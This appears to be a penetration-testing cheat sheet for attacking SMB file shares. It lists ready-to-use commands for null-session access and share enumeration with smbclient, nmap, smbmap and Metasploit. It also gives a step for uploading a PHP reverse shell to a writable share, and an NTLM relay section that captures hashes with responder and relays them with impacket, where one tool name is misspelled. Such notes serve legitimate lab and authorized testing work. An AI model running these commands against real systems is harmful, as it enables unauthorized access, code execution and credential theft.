SMB

Server Message Block - Ports 445/139

smbclient

List Resource list

smbclient -L <IP>

List Null session

smbclient -N <IP>

List User Share

smbclient //IP/<SHARE> -U <USER>

Connect to share

smbclient -N \\\\IP\Share

Without Credentials

smbclient --no-pass //IP/<Share>

Resources list + Null session

smbclient -L \\10.10.10.123 -N

Upload PHP reverse shell

smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php

Type this sequence

recurse
prompt
mget *

Enumeration

Nmap Scan

nmap --script smb-enum-shares.nse -p445 10.10.10.123

Stealthy Nmap Scan

nmap -n -Pn -vv -O -sV -script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1

Metasploit Module

use auxiliary/scanner/smb/smb_enumshares

Connect to host

smbmap -H <IP>

Connect with credentials

smbmap -H <IP> -d <dns> -u '<user>' -p '<pass>'

List Share

smbmap -H <IP> -r <SHARE>

SAMBA

Download file

smbget -U <User> smb://IP/<SHARE_LOCATION> / --download

NTLM Relay Attacks

Capture the Hash

responder -I eth0 -dwv

Relay the hash

impacket-ntrlrelayx -tf target.txt -smb2support -c <payload>

Last updated 3 months ago